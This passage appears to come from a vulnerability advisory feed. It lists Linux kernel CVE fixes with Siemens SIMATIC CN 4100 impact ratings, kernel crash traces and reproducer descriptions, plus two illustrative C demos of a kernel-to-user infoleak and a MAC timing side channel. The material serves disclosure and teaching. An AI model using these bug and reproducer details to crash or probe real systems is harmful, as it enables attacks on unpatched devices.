`INSN_READ` it only fills in at most 1 sample, so if `insn->n` is greater than 1, the remaining `insn->n - 1` samples copied to userspace will be uninitialized kernel data. Another culprit is `vm80xx_ai_insn_read()` in the "vm80xx" driver. It never returns an error, even if it fails to fill the buffer. Fix it in `do_insn_ioctl()` and `do_insnlist_ioctl()` by making sure that uninitialized parts of the allocated buffer are zeroed before handling each instruction. Thanks to Arnaud Lecomte for their fix to `do_insn_ioctl()`. 
That fix replaced the call to `kmalloc_array()` with `kcalloc()`, but it is not always necessary to clear the whole buffer.

[CVE-2025-39684] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39685
In the Linux kernel, the following vulnerability has been resolved:

comedi: pcl726: Prevent invalid irq number

The reproducer passed in an irq number (0x80008000) that was too large, which triggered the oob. Added an interrupt number check to prevent users from passing in an irq number that was too large.

If `it->options[1]` is 31, then `1 << it->options[1]` is still invalid because it shifts a 1-bit into the sign bit (which is UB in C). Possible solutions include reducing the upper bound on the `it->options[1]` value to 30 or lower, or using `1U << it->options[1]`.

The old code would just not attempt to request the IRQ if the `options[1]` value were invalid. And it would still configure the device without interrupts even if the call to `request_irq` returned an error. So it would be better to combine this test with the test below.
[CVE-2025-39685] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39686
In the Linux kernel, the following vulnerability has been resolved:

comedi: Make insn_rw_emulate_bits() do insn->n samples

The `insn_rw_emulate_bits()` function is used as a default handler for `INSN_READ` instructions for subdevices that have a handler for `INSN_BITS` but not for `INSN_READ`. Similarly, it is used as a default handler for `INSN_WRITE` instructions for subdevices that have a handler for `INSN_BITS` but not for `INSN_WRITE`. It works by emulating the `INSN_READ` or `INSN_WRITE` instruction handling with a constructed `INSN_BITS` instruction. However, `INSN_READ` and `INSN_WRITE` instructions are supposed to be able read or write multiple samples, indicated by the `insn->n` value, but `insn_rw_emulate_bits()` currently only handles a single sample. For `INSN_READ`, the comedi core will copy `insn->n` samples back to user-space. (That triggered KASAN kernel-infoleak errors when `insn->n` was greater than 1, but that is being fixed more generally elsewhere in the comedi core.)

Make `insn_rw_emulate_bits()` either handle `insn->n` samples, or return an error, to conform to the general expectation for `INSN_READ` and `INSN_WRITE` handlers.
[CVE-2025-39686] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39687
In the Linux kernel, the following vulnerability has been resolved:

iio: light: as73211: Ensure buffer holes are zeroed

Given that the buffer is copied to a kfifo that ultimately user space can read, ensure we zero it.

[CVE-2025-39687] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39689
In the Linux kernel, the following vulnerability has been resolved:

ftrace: Also allocate and copy hash for reading of filter files

Currently the reader of set_ftrace_filter and set_ftrace_notrace just adds the pointer to the global tracer hash to its iterator. Unlike the writer that allocates a copy of the hash, the reader keeps the pointer to the filter hashes. This is problematic because this pointer is static across function calls that release the locks that can update the global tracer hashes. This can cause UAF and similar bugs.

Allocate and copy the hash for reading the filter files like it is done for the writers. This not only fixes UAF bugs, but also makes the code a bit simpler as it doesn't have to differentiate when to free the iterator's hash between writers and readers.
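CVE-2025-39684, CVE-2025-39686 and CVE-2025-39687 above are one bug class: a kernel buffer sized for n samples (or carrying padding holes) reaches user space even though the handler initialised only part of it, so whatever the slab previously held leaks. The program below is an added user-space simulation, not code from the comedi or iio drivers. It pre-fills a heap buffer with a marker byte that stands in for stale kernel data, runs a hypothetical handler that fills only the first sample (as `insn_rw_emulate_bits()` did), and compares the ioctl path that copies n samples regardless with one that zeroes the buffer before dispatch and also refuses to copy a short fill. The return value is the number of words handed to "user space" that still carry the marker.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Marker that stands in for stale slab contents left by a previous allocation. */
#define STALE_BYTE 0xA5

/* Hypothetical instruction descriptor, loosely modelled on a comedi insn. */
struct insn {
    unsigned int n;     /* number of samples user space asked for */
};

/*
 * Hypothetical handler in the style of insn_rw_emulate_bits() before the fix:
 * it services at most one sample and reports how many it actually wrote.
 */
static int read_one_sample(const struct insn *insn, unsigned int *data)
{
    if (insn->n == 0)
        return 0;
    data[0] = 0x1;      /* one real sample; data[1..n-1] are untouched */
    return 1;
}

/* Simulated non-zeroing allocation: the memory still holds old data. */
static unsigned int *alloc_stale(unsigned int n)
{
    unsigned int *buf = malloc(n * sizeof(*buf));
    if (buf)
        memset(buf, STALE_BYTE, n * sizeof(*buf));
    return buf;
}

/* How many of the n words handed to user space still carry the stale marker. */
static unsigned int count_stale(const unsigned int *user, unsigned int n)
{
    unsigned int marker, leaked = 0;
    memset(&marker, STALE_BYTE, sizeof(marker));
    for (unsigned int i = 0; i < n; i++)
        if (user[i] == marker)
            leaked++;
    return leaked;
}

/* ioctl path before the fix: copies n samples back no matter how many were filled. */
unsigned int leaked_words_buggy(unsigned int n)
{
    struct insn insn = { .n = n };
    unsigned int *kbuf = alloc_stale(n);
    unsigned int *ubuf = calloc(n, sizeof(*ubuf));   /* user-space destination */
    unsigned int leaked = 0;

    if (kbuf && ubuf) {
        int ret = read_one_sample(&insn, kbuf);
        if (ret >= 0)
            memcpy(ubuf, kbuf, n * sizeof(*kbuf));   /* copy_to_user() stand-in */
        leaked = count_stale(ubuf, n);
    }
    free(kbuf);
    free(ubuf);
    return leaked;
}

/*
 * ioctl path after the fix, combining both upstream measures: the buffer is
 * zeroed before the handler runs (so nothing stale can ever be copied), and a
 * handler that fills fewer than n samples is treated as an error.
 */
unsigned int leaked_words_fixed(unsigned int n)
{
    struct insn insn = { .n = n };
    unsigned int *kbuf = alloc_stale(n);
    unsigned int *ubuf = calloc(n, sizeof(*ubuf));
    unsigned int leaked = 0;

    if (kbuf && ubuf) {
        memset(kbuf, 0, n * sizeof(*kbuf));          /* the zeroing step */
        int ret = read_one_sample(&insn, kbuf);
        if (ret >= 0 && (unsigned int)ret == insn.n) /* short fill: -EINVAL instead of copying */
            memcpy(ubuf, kbuf, n * sizeof(*kbuf));
        leaked = count_stale(ubuf, n);
    }
    free(kbuf);
    free(ubuf);
    return leaked;
}

int main(void)
{
    for (unsigned int n = 1; n <= 4; n++)
        printf("n=%u: buggy path leaks %u word(s), fixed path leaks %u\n",
               n, leaked_words_buggy(n), leaked_words_fixed(n));
    return 0;
}
```

Zeroing before dispatch is the cheap, general guard (the as73211 change is the same idea applied to struct padding); checking the handler's fill count against `insn->n` is what turns a silent leak into a visible error, which is why the upstream series did both.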
[CVE-2025-39689] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-416 Use After Free. CVSS 3.1: base score 7.8 (HIGH), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.

CVE-2025-39691
In the Linux kernel, the following vulnerability has been resolved:

fs/buffer: fix use-after-free when call bh_read() helper

There is an issue as follows:

BUG: KASAN: stack-out-of-bounds in end_buffer_read_sync+0xe3/0x110
Read of size 8 at addr ffffc9000168f7f8 by task swapper/3/0
CPU: 3 UID: 0 PID: 0 Comm: swapper/3 Not tainted 6.16.0-862.14.0.6.x86_64
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)
Call Trace:
 dump_stack_lvl+0x55/0x70
 print_address_description.constprop.0+0x2c/0x390
 print_report+0xb4/0x270
 kasan_report+0xb8/0xf0
 end_buffer_read_sync+0xe3/0x110
 end_bio_bh_io_sync+0x56/0x80
 blk_update_request+0x30a/0x720
 scsi_end_request+0x51/0x2b0
 scsi_io_completion+0xe3/0x480
 ? scsi_device_unbusy+0x11e/0x160
 blk_complete_reqs+0x7b/0x90
 handle_softirqs+0xef/0x370
 irq_exit_rcu+0xa5/0xd0
 sysvec_apic_timer_interrupt+0x6e/0x90

The above issue happens when doing an ntfs3 filesystem mount; the issue may happen as follows:

mount                                   IRQ
ntfs_fill_super
  read_cache_page
    do_read_cache_folio
      filemap_read_folio
        mpage_read_folio
          do_mpage_readpage
            ntfs_get_block_vbo
              bh_read
                submit_bh
                wait_on_buffer(bh);
                                        blk_complete_reqs
                                          scsi_io_completion
                                            scsi_end_request
                                              blk_update_request
                                                end_bio_bh_io_sync
                                                  end_buffer_read_sync
                                                    __end_buffer_read_notouch
                                                      unlock_buffer
                wait_on_buffer(bh);--> return will return to caller
                                                    put_bh
                                                      --> trigger stack-out-of-bounds

In the mpage_read_folio() function, the stack variable 'map_bh' is passed to ntfs_get_block_vbo(). Once unlock_buffer() unlocks and wait_on_buffer() returns to continue processing, the stack variable is likely to be reclaimed.
Consequently, during the end_buffer_read_sync() process, calling put_bh() may result in stack overrun.

If the bh is not allocated on the stack, it belongs to a folio. Freeing a buffer head which belongs to a folio is done by drop_buffers() which will fail to free buffers which are still locked. So it is safe to call put_bh() before __end_buffer_read_notouch().

[CVE-2025-39691] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-416 Use After Free. CVSS 3.1: base score 4.4 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39692
In the Linux kernel, the following vulnerability has been resolved:

smb: server: split ksmbd_rdma_stop_listening() out of ksmbd_rdma_destroy()

We can't call destroy_workqueue(smb_direct_wq); before stop_sessions()! Otherwise already existing connections try to use smb_direct_wq as a NULL pointer.

[CVE-2025-39692] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39693
In the Linux kernel, the following vulnerability has been resolved:

drm/amd/display: Avoid a NULL pointer dereference

[WHY]
Although unlikely drm_atomic_get_new_connector_state() or drm_atomic_get_old_connector_state() can return NULL.

[HOW]
Check returns before dereference.
(cherry picked from commit 1e5e8d672fec9f2ab352be121be971877bff2af9)

[CVE-2025-39693] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-476 NULL Pointer Dereference. CVSS 3.1: base score 4.7 (MEDIUM), vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39694
In the Linux kernel, the following vulnerability has been resolved:

s390/sclp: Fix SCCB present check

Tracing code called by the SCLP interrupt handler contains early exits if the SCCB address associated with an interrupt is NULL. This check is performed after physical to virtual address translation. If the kernel identity mapping does not start at address zero, the resulting virtual address is never zero, so that the NULL checks won't work. Subsequently this may result in incorrect accesses to the first page of the identity mapping.

Fix this by introducing a function that handles the NULL case before address translation.

[CVE-2025-39694] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-1285 Improper Validation of Specified Index, Position, or Offset in Input. CVSS 3.1: base score 7.0 (HIGH), vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H.

CVE-2025-39697
In the Linux kernel, the following vulnerability has been resolved:

NFS: Fix a race when updating an existing write

After nfs_lock_and_join_requests() tests for whether the request is still attached to the mapping, nothing prevents a call to nfs_inode_remove_request() from succeeding until we actually lock the page group.
The reason is that whoever called nfs_inode_remove_request() doesn't necessarily have a lock on the page group head.

So in order to avoid races, let's take the page group lock earlier in nfs_lock_and_join_requests(), and hold it across the removal of the request in nfs_inode_remove_request().

[CVE-2025-39697] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'). CVSS 3.1: base score 4.7 (MEDIUM), vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39701
In the Linux kernel, the following vulnerability has been resolved:

ACPI: pfr_update: Fix the driver update version check

The security-version-number check should be used rather than the runtime version check for driver updates. Otherwise, the firmware update would fail when the update binary had a lower runtime version number than the current one.

[ rjw: Changelog edits ]

[CVE-2025-39701] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-1025 Comparison Using Wrong Factors. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39702
In the Linux kernel, the following vulnerability has been resolved:

ipv6: sr: Fix MAC comparison to be constant-time

To prevent timing attacks, MACs need to be compared in constant time. Use the appropriate helper function for this.
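CVE-2025-39702 above is a one-line fix, but the reason a plain byte comparison is dangerous for a MAC is easy to show. The added program below is illustrative and not the kernel's `crypto_memneq()` implementation: an early-exit comparison instrumented to return how many bytes it examined, beside a constant-time comparison in the same style as `crypto_memneq()` (XOR every byte pair, OR into an accumulator, inspect only at the end). The tags are constructed 16-byte values that differ only at a chosen position; the step count of the early-exit version tracks that position, which is exactly the signal a timing attacker measures one byte at a time.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define TAG_LEN 16   /* length of the constructed MAC tags used below */

/*
 * Byte-wise comparison with an early exit, instrumented to return how many
 * bytes it looked at. The count, and so the execution time, depends on the
 * position of the first mismatch: an attacker who can submit guesses and time
 * the verifier learns the tag one byte at a time.
 */
size_t memcmp_early_exit(const uint8_t *a, const uint8_t *b, size_t n, int *equal)
{
    *equal = 1;
    for (size_t i = 0; i < n; i++) {
        if (a[i] != b[i]) {
            *equal = 0;
            return i + 1;       /* bytes examined before giving up */
        }
    }
    return n;
}

/*
 * Constant-time comparison in the style of crypto_memneq(): every byte pair is
 * XORed and OR-ed into an accumulator, and the result is only inspected after
 * the loop. Returns 0 when equal, non-zero otherwise. The volatile accumulator
 * discourages the compiler from reintroducing an early exit.
 */
int ct_memneq(const void *a, const void *b, size_t n)
{
    const uint8_t *pa = a, *pb = b;
    volatile uint8_t acc = 0;

    for (size_t i = 0; i < n; i++)
        acc |= (uint8_t)(pa[i] ^ pb[i]);
    return acc != 0;
}

/* Build two constructed tags that differ only at byte `pos` (equal if pos >= TAG_LEN). */
static void build_tags(uint8_t *expected, uint8_t *received, size_t pos)
{
    for (size_t i = 0; i < TAG_LEN; i++)
        expected[i] = received[i] = (uint8_t)(0x30 + i);
    if (pos < TAG_LEN)
        received[pos] ^= 0x80;
}

/* Work done by the early-exit compare for a mismatch at `pos`. */
size_t early_exit_steps(size_t pos)
{
    uint8_t e[TAG_LEN], r[TAG_LEN];
    int equal;
    build_tags(e, r, pos);
    return memcmp_early_exit(e, r, TAG_LEN, &equal);
}

/* Verifier as it should be written: accept (1) only when ct_memneq() reports no difference. */
int verify_tag_ct(size_t pos)
{
    uint8_t e[TAG_LEN], r[TAG_LEN];
    build_tags(e, r, pos);
    return ct_memneq(e, r, TAG_LEN) == 0;
}

int main(void)
{
    printf("mismatch at byte 0  -> early-exit examined %zu byte(s)\n", early_exit_steps(0));
    printf("mismatch at byte 15 -> early-exit examined %zu byte(s)\n", early_exit_steps(15));
    printf("constant-time verify: equal=%d, byte0=%d, byte15=%d\n",
           verify_tag_ct(TAG_LEN), verify_tag_ct(0), verify_tag_ct(15));
    return 0;
}
```

The constant-time version does the same amount of work for every input, so the remaining leakage is limited to the tag length, which is public anyway. In kernel code the right call is `crypto_memneq()`; in user space, `CRYPTO_memcmp()` (OpenSSL) or `sodium_memcmp()` (libsodium) serve the same purpose, and `memcmp()` must never be used on authentication tags.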
[CVE-2025-39702] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-208 Observable Timing Discrepancy. CVSS 3.1: base score 7.1 (HIGH), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H.

CVE-2025-39703
In the Linux kernel, the following vulnerability has been resolved:

net, hsr: reject HSR frame if skb can't hold tag

Receiving HSR frame with insufficient space to hold HSR tag in the skb can result in a crash (kernel BUG):

[   45.390915] skbuff: skb_under_panic: text:ffffffff86f32cac len:26 put:14 head:ffff888042418000 data:ffff888042417ff4 tail:0xe end:0x180 dev:bridge_slave_1
[   45.392559] ------------[ cut here ]------------
[   45.392912] kernel BUG at net/core/skbuff.c:211!
[   45.393276] Oops: invalid opcode: 0000 [#1] SMP DEBUG_PAGEALLOC KASAN NOPTI
[   45.393809] CPU: 1 UID: 0 PID: 2496 Comm: reproducer Not tainted 6.15.0 #12 PREEMPT(undef)
[   45.394433] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
[   45.395273] RIP: 0010:skb_panic+0x15b/0x1d0
[   45.402911] Call Trace:
[   45.403105]
[   45.404470]  skb_push+0xcd/0xf0
[   45.404726]  br_dev_queue_push_xmit+0x7c/0x6c0
[   45.406513]  br_forward_finish+0x128/0x260
[   45.408483]  __br_forward+0x42d/0x590
[   45.409464]  maybe_deliver+0x2eb/0x420
[   45.409763]  br_flood+0x174/0x4a0
[   45.410030]  br_handle_frame_finish+0xc7c/0x1bc0
[   45.411618]  br_handle_frame+0xac3/0x1230
[   45.413674]  __netif_receive_skb_core.constprop.0+0x808/0x3df0
[   45.422966]  __netif_receive_skb_one_core+0xb4/0x1f0
[   45.424478]  __netif_receive_skb+0x22/0x170
[   45.424806]  process_backlog+0x242/0x6d0
[   45.425116]  __napi_poll+0xbb/0x630
[   45.425394]  net_rx_action+0x4d1/0xcc0
[   45.427613]  handle_softirqs+0x1a4/0x580
[   45.427926]  do_softirq+0x74/0x90
[   45.428196]

This issue was
found by syzkaller.

The panic happens in br_dev_queue_push_xmit() once it receives a corrupted skb with ETH header already pushed in linear data. When it attempts the skb_push() call, there's not enough headroom and skb_push() panics. The corrupted skb is put on the queue by HSR layer, which makes a sequence of unintended transformations when it receives a specific corrupted HSR frame (with incomplete TAG).

Fix it by dropping and consuming frames that are not long enough to contain both ethernet and hsr headers.

Alternative fix would be to check for enough headroom before skb_push() in br_dev_queue_push_xmit().

In the reproducer, this is injected via AF_PACKET, but I don't easily see why it couldn't be sent over the wire from adjacent network.

Further Details:

In the reproducer, the following network interface chain is set up:

┌────────────────┐     ┌────────────────┐
│  veth0_to_hsr  ├─────┤   hsr_slave0   ┼───┐
└────────────────┘     └────────────────┘   │
                                            │   ┌──────┐
                                            ├───┤ hsr0 ├───┐
┌────────────────┐     ┌────────────────┐   │   └──────┘   │   ┌────────┐
│  veth1_to_hsr  ┼─────┤   hsr_slave1   ├───┘              └───┤        │
└────────────────┘     └────────────────┘                      │ bridge │
                                            ┌───────┐      ┌───┤        │
                                            │  ...  ├──────┘   └────────┘
                                            └───────┘

To trigger the events leading up to crash, reproducer sends a corrupted HSR fr ---truncated---

[CVE-2025-39703] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-1286 Improper Validation of Syntactic Correctness of Input. CVSS 3.1: base score 6.5 (MEDIUM), vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39706
In the Linux kernel, the following vulnerability has been resolved:

drm/amdkfd: Destroy KFD debugfs after destroy KFD wq

Since KFD proc content was moved to kernel debugfs, we can't destroy KFD debugfs before kfd_process_destroy_wq.
Move kfd_process_destroy_wq prior to kfd_debugfs_fini to fix a kernel NULL pointer problem. It happens when /sys/kernel/debug/kfd was already destroyed in kfd_debugfs_fini but kfd_process_destroy_wq calls kfd_debugfs_remove_process. This line debugfs_remove_recursive(entry->proc_dentry); tries to remove /sys/kernel/debug/kfd/proc/ while /sys/kernel/debug/kfd is already gone. It hangs the kernel by kernel NULL pointer.

(cherry picked from commit 0333052d90683d88531558dcfdbf2525cc37c233)

[CVE-2025-39706] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39709
In the Linux kernel, the following vulnerability has been resolved:

media: venus: protect against spurious interrupts during probe

Make sure the interrupt handler is initialized before the interrupt is registered. If the IRQ is registered before hfi_create(), it's possible that an interrupt fires before the handler setup is complete, leading to a NULL dereference.

This error condition has been observed during system boot on Rb3Gen2.
[CVE-2025-39709] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39710
In the Linux kernel, the following vulnerability has been resolved:

media: venus: Add a check for packet size after reading from shared memory

Add a check to ensure that the packet size does not exceed the number of available words after reading the packet header from shared memory. This ensures that the size provided by the firmware is safe to process and prevents potential out-of-bounds memory access.

[CVE-2025-39710] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39713
In the Linux kernel, the following vulnerability has been resolved:

media: rainshadow-cec: fix TOCTOU race condition in rain_interrupt()

In the interrupt handler rain_interrupt(), the buffer full check on rain->buf_len is performed before acquiring rain->buf_lock. This creates a Time-of-Check to Time-of-Use (TOCTOU) race condition, as rain->buf_len is concurrently accessed and modified in the work handler rain_irq_work_handler() under the same lock.

Multiple interrupt invocations can race, with each reading buf_len before it becomes full and then proceeding. This can lead to both interrupts attempting to write to the buffer, incrementing buf_len beyond its capacity (DATA_SIZE) and causing a buffer overflow.
Fix this bug by moving the spin_lock() to before the buffer full check. This ensures that the check and the subsequent buffer modification are performed atomically, preventing the race condition. A corresponding spin_unlock() is added to the overflow path to correctly release the lock.

This possible bug was found by an experimental static analysis tool developed by our team.

[CVE-2025-39713] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39714
In the Linux kernel, the following vulnerability has been resolved:

media: usbtv: Lock resolution while streaming

When a program is streaming (ffplay) and another program (qv4l2) changes the TV standard from NTSC to PAL, the kernel crashes due to trying to copy to unmapped memory. Changing from NTSC to PAL increases the resolution in the usbtv struct, but the video plane buffer isn't adjusted, so it overflows.

[hverkuil: call vb2_is_busy instead of vb2_is_streaming]

[CVE-2025-39714] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39715
In the Linux kernel, the following vulnerability has been resolved:

parisc: Revise gateway LWS calls to probe user read access

We use load and stbys,e instructions to trigger memory reference interruptions without writing to memory.
Because of the way read access support is implemented, read access interruptions are only triggered at privilege levels 2 and 3. The kernel and gateway page execute at privilege level 0, so this code never triggers a read access interruption.

Thus, it is currently possible for user code to execute a LWS compare and swap operation at an address that is read protected at privilege level 3 (PRIV_USER).

Fix this by probing read access rights at privilege level 3 and branching to lws_fault if access isn't allowed.

[CVE-2025-39715] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39716
In the Linux kernel, the following vulnerability has been resolved:

parisc: Revise __get_user() to probe user read access

Because of the way read access support is implemented, read access interruptions are only triggered at privilege levels 2 and 3. The kernel executes at privilege level 0, so __get_user() never triggers a read access interruption (code 26).

Thus, it is currently possible for user code to access a read protected address via a system call.

Fix this by probing read access rights at privilege level 3 (PRIV_USER) and setting __gu_err to -EFAULT (-14) if access isn't allowed.

Note the cmpiclr instruction does a 32-bit compare because COND macro doesn't work inside asm.
[CVE-2025-39716] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39718
In the Linux kernel, the following vulnerability has been resolved:

vsock/virtio: Validate length in packet header before skb_put()

When receiving a vsock packet in the guest, only the virtqueue buffer size is validated prior to virtio_vsock_skb_rx_put(). Unfortunately, virtio_vsock_skb_rx_put() uses the length from the packet header as the length argument to skb_put(), potentially resulting in SKB overflow if the host has gone wonky.

Validate the length as advertised by the packet header before calling virtio_vsock_skb_rx_put().

[CVE-2025-39718] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-787 Out-of-bounds Write. CVSS 3.1: base score 7.6 (HIGH), vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H.

CVE-2025-39719
In the Linux kernel, the following vulnerability has been resolved:

iio: imu: bno055: fix OOB access of hw_xlate array

Fix a potential out-of-bounds array access of the hw_xlate array in bno055.c.

In bno055_get_regmask(), hw_xlate was iterated over the length of the vals array instead of the length of the hw_xlate array. In the case of bno055_gyr_scale, the vals array is larger than the hw_xlate array, so this could result in an out-of-bounds access.
In practice, this shouldn't happen though because a match should always be found which breaks out of the for loop before it iterates beyond the end of the hw_xlate array.

By adding a new hw_xlate_len field to the bno055_sysfs_attr, we can be sure we are iterating over the correct length.

[CVE-2025-39719] Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/. Relevant CWE: CWE-20 Improper Input Validation. CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.

CVE-2025-39724
In the Linux kernel, the following vulnerability has been resolved:

serial: 8250: fix panic due to PSLVERR

When the PSLVERR_RESP_EN parameter is set to 1, the device generates an error response if an attempt is made to read an empty RBR (Receive Buffer Register) while the FIFO is enabled.

In serial8250_do_startup(), calling serial_port_out(port, UART_LCR, UART_LCR_WLEN8) triggers dw8250_check_lcr(), which invokes dw8250_force_idle() and serial8250_clear_and_reinit_fifos(). The latter function enables the FIFO via serial_out(p, UART_FCR, p->fcr). Execution proceeds to the serial_port_in(port, UART_RX). This satisfies the PSLVERR trigger condition.

When another CPU (e.g., using printk()) is accessing the UART (UART is busy), the current CPU fails the check (value & ~UART_LCR_SPAR) == (lcr & ~UART_LCR_SPAR) in dw8250_check_lcr(), causing it to enter dw8250_force_idle().

Put serial_port_out(port, UART_LCR, UART_LCR_WLEN8) under the port->lock to fix this issue.

Panic backtrace:
[    0.442336] Oops - unknown exception [#1]
[    0.442343] epc : dw8250_serial_in32+0x1e/0x4a
[    0.442351]  ra : serial8250_do_startup+0x2c8/0x88e
...
[    0.442416]  console_on_rootfs+0x26/0x70

